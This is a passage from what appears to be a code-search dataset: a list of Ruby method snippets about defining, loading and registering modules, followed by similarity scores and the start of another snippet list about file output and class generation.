"def generate_module(module_name, env_name, modulepath)\n module_pp = <<-MANIFEST_SNIPPET\n \"#{modulepath}\":;\n \"#{modulepath}/#{module_name}\":;\n \"#{modulepath}/#{module_name}/manifests\":;\n\n \"#{modulepath}/#{module_name}/manifests/init.pp\":\n ensure => file,\n content => 'class #{module_name} {\n notify { \"include #{env_name} #{module_name}\": }\n }'\n ;\n MANIFEST_SNIPPET\n end",
"def mod(rule, &block)\n rule.extension = Module.new(&block)\n rule\n end",
"def add(modName,privMsg=false)\n begin\n if @dir.find{|file| file.sub!(/\\.rb$/,\"\"); file == modName} \t\n load \"./lib/modules/#{modName}.rb\"\n klass = \"linael/modules/#{modName}\".camelize.constantize\n if (has_key?(klass::Name))\n answer(privMsg,\"Module already loaded, please unload first\")\n else\n if (klass.require_auth && @authModule.empty?)\n answer(privMsg,\"You need at least one authMethod to load this module\") \n else\n if matchRequirement?(klass.required_mod)\n mod = Modules::ModuleType.new(@runner,klass: klass,privMsg: privMsg)\n addMod(mod)\n @authModule << klass::Name if klass::auth?\n answer(privMsg,\"Module #{modName} loaded!\")\n else\n answer(privMsg,\"You do not have loaded all the modules required for this module.\") \n answer(privMsg,\"Here is the list of requirement: #{klass.required_mod.join(\" - \")}.\") \n end\n end\n end\n end\n rescue Exception\n puts $!\n answer(privMsg,\"Problem when loading the module\") \n talk(privMsg.who,$!) \n end\n end",
"def create_module\n template 'bpmn_module.rb.template', File.join(model_path, \"#{module_name.underscore}.rb\")\n end",
"def ensure_outer_module_declarations(mod); end",
"def add_module(mod, name, modinfo = nil)\n\n\n\t\t# Set the module's name so that it can be referenced when\n\t\t# instances are created.\n\t\tmod.framework = framework\n\t\tmod.refname = name\n\t\tmod.file_path = ((modinfo and modinfo['files']) ? modinfo['files'][0] : nil)\n\t\tmod.orig_cls = mod\n\n\t\tif (get_hash_val(name) and get_hash_val(name) != SymbolicModule)\n\t\t\tmod_ambiguous[name] = true\n\n\t\t\twlog(\"The module #{mod.refname} is ambiguous with #{self[name].refname}.\")\n\t\telse\n\t\t\tself[name] = mod\n\t\tend\n\n\t\t# Check to see if we should update info\n\t\tnoup = true if (modinfo and modinfo['noup'])\n\n\t\t# Add this module to the module cache for this type\n\t\tframework.modules.cache_module(mod) if (noup != true)\n\t\n\t\t# Invalidate the sorted array\n\t\tinvalidate_sorted_cache\n\n\t\t# Return the modlicated instance for use\n\t\tmod\n\tend",
"def association_module_def(name, opts=OPTS, &block)\n association_module(opts).module_eval{define_method(name, &block)}\n end",
"def redefine_method(name, &block)\n if instance_methods(false).any? {|x| x.to_s == name.to_s }\n method = instance_method(name)\n mod = Module.new do\n define_method(name) {|*args| method.bind(self).call(*args) }\n end\n remove_method(name)\n include(mod)\n end\n include(Module.new { define_method(name, &block) })\n end",
"def [](name)\n if (super == Msf::SymbolicModule)\n create(name)\n end\n\n super\n end",
"def helper(name, &block)\n (class << self; self; end).send(:define_method, name, &block)\n end",
"def mod(name)\n master.module_instance name\n end",
"def method_missing(method, *args)\n add_module(method, *args)\n end",
"def create_module_and_branch(opts = {})\n self.module_class.create_module(self.project, self.local_params, return_module_branch: true, create_implementation: opts[:create_implementation], donot_push_to_repo_manager: true)\n end",
"def def_checker sym, &block\n sym = \"check_#{sym}\".to_sym\n define_method sym,&block\n module_function sym\n end",
"def def_checker sym, &block\n sym = \"check_#{sym}\".to_sym\n define_method sym,&block\n module_function sym\n end",
"def module_namespacing(&block)\n content = capture(&block)\n content = wrap_with_namespace(content) if namespace\n end",
"def add_module(class_type, name)\n mod = @classes[name] || @modules[name]\n return mod if mod\n\n full_name = child_name name\n mod = @store.modules_hash[full_name] || class_type.new(name)\n\n add_class_or_module mod, @modules, @store.modules_hash\n end",
"def rygsaek_modules_hook!\n yield\n end",
"def part(name)\n parts_for(caller_locations(1, 1)[0].label.to_sym).define_part(name, yield)\n end",
"def define_cached_module(js_mod_name)\n # use bracket-syntax to handle non-identifier chars, e.g. 'source-map'\n mod_qname = \"#{JS_MOD}._cache[#{js_mod_name.inspect}]\"\n @runtime.eval(%Q|#{mod_qname} = new #{JS_MOD}(\"#{js_mod_name}\")|)\n \"#{mod_qname}.exports\"\n end",
"def extended_modules; end",
"def add_namespace(name, cxxname = nil)\n cxxname = name if cxxname == nil \n\n ns = Namespace.new(name, cxxname)\n\n yield ns\n\n @modules << ns\n end",
"def declare_dsl(name=nil, global: false, &block)\n raise ArgumentError.new('No block given for DSL creation') unless block\n raise ArgumentError.new('Cannot specify both a cookbook name and global mode') if name && global\n\n # Create the mixin module.\n dsl_mod = Module.new(&block)\n\n # Handle the simple case for global DSL modifications. Probably don't use\n # this feature much.\n if global\n Chef::Recipe.include(dsl_mod)\n Chef::Resource.include(dsl_mod)\n # TODO: Provider?\n return\n end\n\n # Find which cookbook we were declared in.\n unless name\n name_mod = Module.new do\n def self.name\n 'poise-dsl stub'\n end\n extend Poise::Helpers::DefinedIn::ClassMethods\n end\n # Drop any stack frames from inside poise-dsl itself.\n name_mod.poise_defined!(caller.reject {|line| line =~ /poise_dsl([\\/\\\\]dsl)?\\.rb/ })\n end\n\n # Activator module used as part of the monkeypatching.\n do_patch = lambda do |obj|\n # Find the actual cookbook name the DSL was defined in if no explicit\n # name request was given.\n name ||= name_mod.poise_defined_in_cookbook(obj.run_context)\n # Check if we should enable this DSL.\n if Array(name).include?(obj.cookbook_name.to_s)\n Chef::Log.debug(\"[poise-dsl] Loading DSL #{name.inspect} in to #{obj.class} #{obj.cookbook_name}\")\n obj.singleton_class.prepend(dsl_mod)\n else\n Chef::Log.debug(\"[poise-dsl] Skipping DSL #{name.inspect} for #{obj.class} #{obj.cookbook_name}\")\n end\n end\n\n # Patch the loading behavior in to Chef::Recipe.\n Chef::Recipe.prepend(Module.new do\n define_method(:initialize) do |*args, &init_block|\n super(*args, &init_block)\n do_patch.call(self)\n end\n end)\n\n # Patch the loading behavior in to Chef::Resource.\n Chef::Resource.prepend(Module.new do\n define_method(:cookbook_name=) do |val|\n super(val).tap do\n do_patch.call(self)\n end\n end\n end)\n end",
"def method_missing(name)\n name = name.to_s \n \n # Class name\n class_name = \"_\" << name\n class_name.gsub!(self.class::CLASS_NAME_GENERATOR) { |s| s[1].chr.upcase }\n\n # Module name\n module_name = @module.name + \"::\" + class_name\n \n # File path\n file_path = \"x\" << module_name\n file_path.gsub!(self.class::FILE_NAME_GENERATOR) { |s| s[0].chr << \"-\" << s[1].chr }\n file_path.replace(file_path[2..-1])\n file_path.gsub!(\"::\", \"/\")\n file_path.downcase!\n \n if not @@files.has_key? file_path\n require file_path\n @@files[file_path] = true\n end\n \n return __get_module(module_name)\n end",
"def add_module(class_type, name)\n return @classes[name] if @classes.key? name\n\n add_class_or_module @modules, class_type, name, nil\n end",
"def module_def(node, current_binding)\n mod = Wtf::Lang::ModuleType.new(node, current_binding, node.bindings)\n execute_stmt_list(node.stmt_list, node.bindings)\n mod\n end",
"def register_module_function(object); end",
"def enable_extension(name)\n end",
"def util_fake_extension(spec, name = \"a\", script = nil)\n mkrf_conf = File.join(\"ext\", name, \"mkrf_conf.rb\")\n\n spec.extensions << mkrf_conf\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(mkrf_conf)\n File.open mkrf_conf, \"w\" do |f|\n if script\n f.write script\n else\n f.write <<~EOF\n File.write('Rakefile', \"task :default\")\n EOF\n end\n end\n end\n end",
"def define_cached_module(js_mod_name)\n # use bracket-syntax to handle non-identifier chars, e.g. 'source-map'\n mod_qname = \"#{JS_MOD}._cache[#{js_mod_name.inspect}]\"\n puts \"define_cached_module(#{js_mod_name.inspect}) -> mod_qname= #{mod_qname}\"\n @runtime.eval(%Q|#{mod_qname} = new #{JS_MOD}(\"#{js_mod_name}\")|)\n \"#{mod_qname}.exports\"\n end",
"def using *extension_names\n extension_names.each do |extension_name|\n if extension = @@__extensions.find{|ext| ext.__name.to_s == extension_name.to_s }\n extension.extension_used self if extension.respond_to? :extension_used\n self.metaclass.send :define_method, :\"#{extension_name}\" do\n return extension\n end\n else\n raise ExtensionNotFoundError, \"Extension not found: #{extension_name}\"\n end\n end\n end",
"def util_fake_extension(spec, name = \"a\", script = nil)\n mkrf_conf = File.join(\"ext\", name, \"mkrf_conf.rb\")\n\n spec.extensions << mkrf_conf\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(mkrf_conf)\n File.open mkrf_conf, \"w\" do |f|\n if script\n f.write script\n else\n f.write <<-EOF\n File.open 'Rakefile', 'w' do |rf| rf.puts \"task :default\" end\n EOF\n end\n end\n end\n end",
"def util_bake_gem(name = \"a\", *extra, &block)\n files = [\"lib/#{name}.rb\"].concat(extra)\n\n spec = if Gem::VERSION >= \"3.0.0\"\n util_spec name, \"1\", nil, files, &block\n else\n new_spec name, \"1\", nil, files, &block\n end\n\n util_build_gem spec\n\n spec.cache_file\n end",
"def initialize(java_name, rubymod = nil)\n pkg = java_name.split(JAVA_PKG_SEP)\n pkg = rubymod ? [rubymod, ns2mod(pkg[-1])] : pkg.map { |part| ns2mod(part) }\n\n parts = pkg.pop.split(JAVA_CLASS_SEP)\n @basename = parts.pop\n @outter_class = parts.join(RUBY_PKG_SEP)\n @module = rubymod || pkg.join(RUBY_PKG_SEP)\n @name = [@module, @outter_class, @basename].reject(&:empty?).join(RUBY_PKG_SEP)\n\n super @name\n end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def meta_def(name, &block)\n meta_eval{define_method(name, &block)}\n end",
"def helper_method(name, &block)\n application.send(:define_method, name, &block)\n end",
"def ensure_method(name, &block)\n define_singleton_method(name, &block) unless respond_to?(name)\n end",
"def load_source_and_set_module; end",
"def [](name)\n detect {|mod| mod.name == name}\n end",
"def require(name)\n loader = new name\n\n case loader.require\n when :ruby\n begin\n\n Rubinius.run_script loader.cm\n ensure\n loader.finished\n end\n when :library\n when false\n return false\n else\n raise \"received unknown type from #{loader.class}#require\"\n end\n\n loader.add_feature\n @loaded_hook.trigger! loader.path\n return true\n end",
"def add_module(name, outputter)\n assert_project_file(config.project)\n\n installer = Bolt::ModuleInstaller.new(outputter, pal)\n\n installer.add(name,\n config.project.modules,\n config.project.puppetfile,\n config.project.managed_moduledir,\n config.project.project_file,\n config.module_install)\n end",
"def only_name(mod); end",
"def module\n RDoc::TopLevel.find_module_named(@name) || @name\n end",
"def util_bake_gem(name = \"a\", *extra, &block)\n files = [\"lib/#{name}.rb\"].concat(extra)\n\n spec = new_spec name, \"1\", nil, files, &block\n\n File.join @tempdir, \"gems\", \"#{spec.full_name}.gem\"\n end",
"def define &block\n new block\n end",
"def meta_def(name, &block)\n meta_eval { define_method(name, &block) }\n end",
"def wrapper(name); end",
"def module?\n true\n end",
"def module?\n true\n end",
"def def(name, &block)\n @runtime_methods[name.to_s] = block\n end",
"def attach_rb_functions_to_mod_cache(js_mod_name, rb_mod)\n js_mod_name = \"*\" + js_mod_name\n exports_qname = define_cached_module(js_mod_name)\n attach_rb_functions(%Q|#{exports_qname}|, rb_mod)\n exports_qname\n end",
"def define method_name, &block\n machine.named_procs[method_name] = block\n end",
"def initialize(name,&ruby_block)\n # Checks and sets the name.\n @name = name.to_sym\n # Sets the block for instantiating a task.\n @ruby_block = ruby_block\n # Sets the instantiation procedure if named.\n return if @name.empty?\n obj = self\n HDLRuby::High.space_reg(@name) do |*args|\n obj.instantiate(*args)\n end\n end",
"def module?\n false\n end",
"def create(name)\n klass = fetch(name, nil)\n instance = nil\n\n # If there is no module associated with this class, then try to demand\n # load it.\n if klass.nil? or klass == Msf::SymbolicModule\n # If we are the root module set, then we need to try each module\n # type's demand loading until we find one that works for us.\n if module_type.nil?\n Msf::MODULE_TYPES.each { |type|\n framework.modules.load_cached_module(type, name)\n }\n else\n framework.modules.load_cached_module(module_type, name)\n end\n\n recalculate\n\n klass = fetch(name, nil)\n end\n\n # If the klass is valid for this name, try to create it\n unless klass.nil? or klass == Msf::SymbolicModule\n instance = klass.new\n end\n\n # Notify any general subscribers of the creation event\n if instance\n self.framework.events.on_module_created(instance)\n end\n\n return instance\n end",
"def add( name , options={} , &proc )\n options = name if name.is_a? Hash\n if options[:package]\n package options.delete(:package)\n else\n package self\n end.add( name , options , &proc )\n end",
"def enable_extension(name, **)\n end",
"def add_module_by_normal_module(mod)\n add_class_or_module mod, @modules, @store.modules_hash\n end",
"def di_init(name, &block)\n di_define_method(name, block, nil)\n end",
"def create_method(name, &block)\n eigen = class << self; self; end\n eigen.send(:define_method, name, &block)\n end",
"def attach_rb_functions_to_mod_cache(js_mod_name, rb_mod)\n exports_qname = define_cached_module(js_mod_name)\n attach_rb_functions(%Q|#{exports_qname}|, rb_mod)\n exports_qname\n end",
"def create_method(name, &block)\n\t\t\tself.class.send(:define_method, name, &block)\n\t\tend",
"def create_method( name, &block )\n self.class.send( :define_method, name, &block )\n end",
"def add(name, &block)\n define_method(name.to_sym) { yield block }\n end",
"def initialize(name=:js_build)\n @name = name\n @description = \"Building/Concatenating the JS files\"\n @pattern = '*.js'\n @deps = []\n @outdir = \".\"\n @inputdirs = []\n\n # don't look here!\n @file_list = []\n\n yield self if block_given?\n define\n end",
"def project_module(name, controller=nil, &block)\n @project_modules << ProjectModule.new(name, controller, &block)\n end",
"def gemspec_building_block=(_arg0); end",
"def test(name, &block)\n c = Class.new(self)\n c.send(:include, Kintama::Test)\n c.name = name\n c.definition = find_definition(&block)\n c.block = block if block_given?\n end",
"def meta_def( name, &blk )\r\n meta_eval { define_method name, &blk }\r\n end",
"def after_module(class_node); end",
"def meta_def name, &block\n meta_eval { define_method name, &block }\n end",
"def initialize(name, &block)\n @name = name\n @modules = []\n @writer_mode = :multiple\n @requesting_console = false\n @force_rebuild = false\n\n @options = {\n :include_paths => [],\n :library_paths => [],\n :libraries => [],\n :cxxflags => [],\n :ldflags => [],\n :include_source_files => [],\n :includes => []\n }\n\n @node = nil\n\n parse_command_line\n\n if requesting_console?\n block.call(self) if block\n start_console\n elsif block\n build_working_dir(&block)\n block.call(self)\n build\n write\n compile\n end\n end",
"def uses?(mod); end",
"def initialize(args,*options)\n super\n full_name = file_name.underscore\n\n @module_name = full_name.split('_').last\n @module_path = 'modules/' + full_name\n\n end",
"def meta_def(name, &blk)\n meta_eval { define_method(name, &blk) }\n end",
"def module_template(app_name, place, module_name, &block)\n str = <<TEXT\nmodule #{app_name}\n module #{place}\n module #{module_name}\n #{block.call if block}\n end\n end\nend\nTEXT\nend",
"def initialize task_name = :opal, &block\n @task_name = task_name\n @builder = Builder.new\n @bundle = @builder.bundle\n\n @bundle.config(:normal) { yield @bundle } if block_given?\n\n define\n end",
"def pre_hard_load(mod); end",
"def extend(mod)\n @modules << mod\n super(mod)\n end",
"def parse_module container, single, tk, comment\n container, name_t, = get_class_or_module container\n\n name = name_t[:text]\n\n mod = container.add_module RDoc::NormalModule, name\n mod.ignore unless container.document_children\n record_location mod\n\n read_documentation_modifiers mod, RDoc::CLASS_MODIFIERS\n mod.add_comment comment, @top_level\n parse_statements mod\n\n # after end modifiers\n read_documentation_modifiers mod, RDoc::CLASS_MODIFIERS\n\n @stats.add_module mod\n end"
] |
[
"0.70542896",
"0.63600147",
"0.63388777",
"0.6207249",
"0.6157514",
"0.6134244",
"0.5998924",
"0.5945504",
"0.5939234",
"0.592648",
"0.5912476",
"0.5887213",
"0.58512485",
"0.58236164",
"0.58232397",
"0.5808011",
"0.5796311",
"0.57720864",
"0.57386017",
"0.57356143",
"0.5714716",
"0.5686191",
"0.5683269",
"0.56711173",
"0.56666136",
"0.5647269",
"0.5645014",
"0.5616988",
"0.56065476",
"0.55833733",
"0.5572921",
"0.55725795",
"0.55716985",
"0.55716985",
"0.5556022",
"0.554625",
"0.5528291",
"0.5526275",
"0.5526249",
"0.55228984",
"0.55205154",
"0.55050164",
"0.5504211",
"0.5498007",
"0.5491836",
"0.54849595",
"0.5461611",
"0.5449541",
"0.54488146",
"0.5438031",
"0.5418487",
"0.5414709",
"0.54078263",
"0.54057413",
"0.5395885",
"0.5395355",
"0.53931",
"0.53833055",
"0.53758407",
"0.5366651",
"0.5364301",
"0.5359591",
"0.5358013",
"0.5356296",
"0.5349732",
"0.5341496",
"0.5340361",
"0.5334302",
"0.5334302",
"0.5334179",
"0.5332357",
"0.5328865",
"0.5320542",
"0.5311639",
"0.52993524",
"0.52862203",
"0.52778685",
"0.5275663",
"0.52688426",
"0.5262468",
"0.5251836",
"0.5251398",
"0.52498055",
"0.52482915",
"0.5241895",
"0.5236012",
"0.52359974",
"0.5222919",
"0.5216832",
"0.52102715",
"0.52083033",
"0.52074623",
"0.5198038",
"0.5197173",
"0.51893795",
"0.5188312",
"0.51806384",
"0.51801777",
"0.5179598",
"0.5177541"
] |
0.6238118
|
3
|
Specify the mode with which to write out code files. This can be one of two modes: :multiple (default), where each class and module gets its own set of hpp/cpp files, and :single, where everything gets written to a single file.
|
def writer_mode(mode)
raise "Unknown writer mode #{mode}" unless [:multiple, :single].include?(mode)
@writer_mode = mode
end
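An illustrative call, assuming writer_mode is invoked on the same extension object as the methods above:

# Hypothetical usage; ext is a placeholder for the extension instance.
ext.writer_mode :single    # everything goes into a single generated file
ext.writer_mode :multiple  # default: one hpp/cpp pair per class and module
# any other symbol raises: Unknown writer mode <mode>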
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def write\n Logger.info \"Writing code to files\"\n prepare_working_dir\n process_other_source_files\n\n # Create the code\n writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter\n writer_class.new(@builder, @working_dir).write\n\n # Create the extconf.rb\n extconf = Writers::ExtensionWriter.new(@builder, @working_dir)\n extconf.options = @options\n extconf.write\n Logger.info \"Files written\"\n end",
"def push_mode(mode)\n if ModeTag[mode] then\n output_indentation\n css_class = \"\"\n css_class = \" class=\\\"src\\\"\" if mode == :src\n css_class = \" class=\\\"example\\\"\" if (mode == :example || mode == :inline_example)\n @logger.debug \"#{mode}: <#{ModeTag[mode]}#{css_class}>\\n\" \n @output << \"<#{ModeTag[mode]}#{css_class}>\\n\" unless mode == :table and skip_tables?\n # Entering a new mode obliterates the title decoration\n @title_decoration = \"\"\n end\n super(mode)\n end",
"def write(new_files)\n case settings[:style]\n when :classic\n # Single file\n printf \"Writing classic app to: %s\\n\", settings[:output_file]\n File.open(settings[:output_file], 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n new_files.each do |file|\n f << \"\\n# #{file.first.sub(/\\.rb$/,'').humanize}\\n\"\n f << file.last\n end\n end\n when :modular\n # Separate files\n new_files.each do |file|\n filename = \"#{settings[:output_dir]}/#{file.first}\"\n printf \" write %-40s\\n\", filename\n File.open(filename, 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n f << \"class #{settings[:class_name]}\\n\"\n f << file.last\n f << \"end\\n\" \n end\n end\n else\n raise \"Invalid style for Sinatra::FromRails: #{settings[:style]} (must be :classic or :modular)\"\n end\n end",
"def set_export_mode mode\n @export_mode = mode\n end",
"def compileclass(output,classname)\n #File.open(output, \"a\") { |f| f.write \"<class>\\n <\" }\n end",
"def write!(fname, mode = 'w', what = :prg)\n File.open(fname, mode) do |fd|\n case what\n when :prg\n fd.write(to_binary)\n when :src\n fd.write(to_source.join(\"\\n\"))\n when :dump\n fd.write(dump.join(\"\\n\"))\n else\n raise BlockError, 'Unknown generation mode'\n end\n end\n end",
"def write_case_mode(filename, f, mode, data)\n f.puts(\"# ==================== #{mode} mode ====================\")\n\n if mode == 'CS61B'\n gitlet = GITLET\n whichdata = 0\n suffix = ''\n else\n gitlet = BOTHMODES ? GITLETAPP : GITLET\n whichdata = -1\n suffix = '.app'\n end\n\n f.puts '{ rm -rf workingdir && mkdir workingdir; } || abort \"Failed to create test directory\"'\n f.puts 'cd workingdir || abort \"Failed to enter test directory\"'\n f.puts\n\n run_cnt = 0\n for type, cmd, *cmddata in data\n case type\n when :shell\n f.puts 'cat <<EOF'\n f.puts 'Running: ' + cmd\n f.puts 'EOF'\n f.puts cmd\n\n when :gitlet\n termstat, stdout, stderr = cmddata[whichdata]\n run_cnt += 1\n\n need_confirm = false\n if mode == 'CS61B'\n %w(checkout reset merge rebase i-rebase pull).each {|c|\n need_confirm = true if cmd.start_with? (c+' ')\n }\n end\n\n f.puts \"cat <<EOF\"\n f.puts \"Running: gitlet #{cmd}\"\n f.puts \"EOF\"\n f.write \"echo yes | \" if need_confirm\n f.puts \"#{gitlet} #{cmd}\" + ' > ../actual/stdout 2> ../actual/stderr'\n\n f.puts \"TESTERVAR_TERMSTAT=$?\"\n f.puts \"[[ $TESTERVAR_TERMSTAT == #{termstat} ]] \" +\n \"|| fail \\\"Expected \\\\$?: #{termstat} actual: $TESTERVAR_TERMSTAT (run ##{run_cnt})\\\"\"\n\n check_output = proc {|stream, content|\n expected = \"#{filename}.d/#{run_cnt}#{suffix}.#{stream}\"\n content.unshift(\"WARNING: Using APP mode, not suitable for CS 61B submission\") if stream == 'err' && mode == 'APP'\n content.unshift(\"Warning: The command you entered may alter the files in your working directory. Uncommitted changes may be lost. Are you sure you want to continue? (yes/no)\") if stream == 'out' && need_confirm\n if content.empty?\n f.puts \"diff -q ../actual/std#{stream} /dev/null || fail 'Failure: std#{stream} should be empty'\"\n else\n open(expected, ?w) {|f2| f2.puts(content) }\n f.puts \"diff -q ../actual/std#{stream} ../'#{expected}' || fail 'Failure: std#{stream} differs from expected version'\"\n end\n }\n check_output.call('out', stdout)\n check_output.call('err', stderr)\n\n else # ouch\n end\n f.puts\n end\n\n f.puts 'cd ..'\n f.puts\nend",
"def setup_definition(mode)\n source_definition = sources_dir.join(\"#{mode}_definition.rb\")\n log.info \"Using definition #{source_definition}\"\n FileUtils.cp(source_definition, definition_path)\n end",
"def set_mode(mode)\n @mode = mode\n\n if mode == 'w'\n File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/direction\", \"w\") { |f| f.write(GPIO_DIRECTION_WRITE) }\n @pin_file = File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/value\", \"w\")\n elsif mode =='r'\n File.open(\"#{ GPIO_PATH }/gpio#{ pin_num }/direction\", \"w\") { |f| f.write(GPIO_DIRECTION_READ) }\n @pin_file = File.open(\"#{ GPIO_PATH }/gpio#{pin_num}/value\", \"r\")\n end\n end",
"def write\n case parser_name\n when \"d3mpq_stringlist\"\n write_stringlist\n when \"d3mpq_recipe\"\n write_recipe\n when \"d3mpq_coredata_gamebalance_setitembonuses\"\n @field = nil\n write_recipe\n when \"d3mpq_attributes\"\n write_single_file(\"analyze\")\n when \"d3mpq_coredata_actor\"\n write_single_file(\"analyze\")\n else\n write_game_balance\n end\n end",
"def mode name, &b\n mode_definitions << [name, b]\n end",
"def write\n\t\t#clear the directory before doing anything else\n\t\tclear @path\n\n\t\t#write out source code files\n\t\t@molds.each do |mold|\n\t\t\twrite_object(mold.name + \".h\", header(mold))\n\t\t\twrite_object(mold.name + \".m\", source(mold))\n\t\tend\n\tend",
"def check_mode_file()\n output_file = $fact_dir+\"/\"+$mode_file\n if !File.exist?(output_file)\n puts \"Creating \"+output_file\n file = File.open(output_file,\"w\")\n file.write(\"# Set #{$module_name} mode\\n\")\n file.write(\"#\\n\")\n file.write(\"# report = Audit (no changes made)\\n\")\n file.write(\"# lockdown = Lockdown (changes mage)\\n\")\n file.write(\"# detailedreport = Detailed Audit (Include Fix Information)\\n\")\n file.write(\"#\\n\")\n file.write(\"require 'facter'\\n\")\n file.write(\"\\n\")\n file.write(\"Facter.add('#{$module_name}_mode') do\\n\")\n file.write(\" setcode do\\n\")\n file.write(\" #{$module_name}_mode = '#{$fact_mode}'\\n\")\n file.write(\" end\\n\")\n file.write(\"end\\n\")\n file.write(\"\\n\")\n file.close()\n end\n return\nend",
"def file_mode\n File.instance_methods.include?(:test_write) ? 'r' : 'w'\n end",
"def file_mode\n File.instance_methods.include?(:test_write) ? \"r\" : \"w\"\n end",
"def mode; end",
"def mode; end",
"def mode; end",
"def mode; end",
"def output_to_file\n @output=:file\n end",
"def easy_mode(type, args)\n Dir.chdir File.dirname(args.first)\n const_get(type).new(*args).easy_mode\n end",
"def modes; end",
"def rebuild(options)\n puts \"rebuilding to #{options[:out]}\"\n puts options[:files].inspect\n File.open(options[:out], 'w') do |out|\n # out.write @pre if @pre\n\n options[:files].each do |file|\n out.write wrap_source file\n end\n\n if options[:main]\n main = options[:main].sub(/\\.rb$/, '')\n out.write \"opal.require('#{main}');\\n\"\n end\n\n # out.write @post if @post\n end\n end",
"def mode() end",
"def get_definition(codeClass, outCode)\n outCode.indent\n \n outCode.add(\"/**\")\n outCode.add(\"* Logs this class's info to a stream\")\n outCode.add(\"*\")\n outCode.add(\"* @param outStr The stream theis class is being logged to\")\n outCode.add(\"* @param indent The amount we we indent each line in the class output\")\n outCode.add(\"* @param logChildren Whether or not we will write objects side this object\")\n outCode.add(\"* to the debug stream\")\n outCode.add(\"*/\")\n \n outCode.add(\"void logIt(fHandle, indent, logChildren)\")\n outCode.add(\"{\")\n \n outcode.indent\n \n if codeClass.hasAnArray\n outCode.add(\"int i;\")\n end\n \n outCode.add(\"fwrite(fHandle, indent + \\\" -- \" << codeClass.name << \" begin -- \\\");\")\n \n varArray = Array.new\n codeClass.getAllVarsFor(varArray);\n\n for varSec in varArray\n if varSec.elementId == CodeElem::ELEM_VARIABLE\n if !varSec.isPointer\n if varSec.arrayElemCount > 0\n if XCTECpp::Utils::isPrimitive(varSec)\n outCode.add(\"fwrite(fHandle, indent + \\\"\" << varSec.name << \": \\\");\")\n outCode.add(\"foreach (\" << varSec.name << \" as \" << varSec.name << \"__Item)\")\n outCode.iadd(1, \"fwrite(fHandle, \" << varSec.name << \"__Item + \\\" \\\");\")\n outCode.iadd(1, 'fwrite(fHandle, \"\\\"));')\n else\n outCode.iadd(1, 'fwrite(indent + \"' << varSec.name << \": \\\");\")\n \n outCode.add(\"if (logChildren)\")\n outCode.add(\"{\")\n outCode.iadd(1, \"foreach (\" << varSec.name << \" as \" << varSec.name << \"__Item)\")\n outCode.iadd(2, varSec.name << \"__Item.logIt(outStr, indent + \\\" \\\");\")\n outCode.iadd(2, 'fwrite(fHandle, \"\\\"));') \n outCode.add(\"}\")\n end\n else # Not an array \n if XCTECpp::Utils::isPrimitive(varSec) \n outCode.add(\"fwrite(indent + \\\"\" << varSec.name << \": \\\" + \" << varSec.name << \");\")\n else \n outCode.add(\"fwrite(indent + \\\"Object \" << varSec.name << \": \\\");\")\n outCode.add(\"if (logChildren)\")\n outCode.iadd(1, varSec.name << \".logIt(outStr, indent + \\\" \\\");\")\n end\n end \n else\n #outCode.add(\"pStream.println(indent + \" << varSec.name << \");\")\n end\n elsif varSec.elementId == CodeElem::ELEM_COMMENT\n outCode.add(XCTEPhp::Utils::getComment(varSec));\n elsif varSec.elementId == CodeElem::ELEM_FORMAT\n outCode.add(varSec.formatText)\n end\n end\n \n outCode.add(\"fwrite(indent + \\\" -- \" << codeClass.name << \" end -- \\\");\")\n \n outCode.unindent\n \n outCode.add(\"}\")\n \n outCode.unindent\n end",
"def generate_class_and_module_files\n template_file = @template_dir + 'class-page.html.erb'\n debug_msg \"Generating class documentation\"\n @unique_classes_and_modules.each do |klass|\n debug_msg \" %s %s\" % [klass.type, klass.full_name]\n outfile = @output_dir + klass.path\n @class = klass\n self.render_template(template_file, binding(), outfile)\n end\n end",
"def output_ext; end",
"def output_ext; end",
"def output_ext; end",
"def mode(*modes, &block)\n fail_if_wrong_modes modes\n fail 'Block required' unless block_given?\n self.current_modes = modes\n instance_eval(&block)\n reset_modes\n end",
"def mode=(mode)\n \n write(\"++mode 1\" ) if mode==:Device \n write(\"++mode 0\" ) if mode==:Controller\n @mode = write(\"++mode\",true).to_i==1 ? :Controller : :Device\n end",
"def output_name\n @output_name ||=\n case @format\n when :pcore\n \"#{File.basename(@path, '.rb')}.pp\"\n else\n raise _(\"unsupported format '%{format}'.\") % { format: @format }\n end\n end",
"def generate_class_files\n debug_msg \"Generating class documentation in #@outputdir\"\n templatefile = Pathname.new(File.dirname(__FILE__) + '/template/railsfish/classpage.rhtml')\n \n @classes.each do |klass|\n debug_msg \" working on %s (%s)\" % [ klass.full_name, klass.path ]\n outfile = @outputdir + klass.path\n rel_prefix = @outputdir.relative_path_from( outfile.dirname )\n svninfo = self.get_svninfo( klass )\n \n debug_msg \" rendering #{outfile}\"\n self.render_template( templatefile, binding(), outfile )\n end\n end",
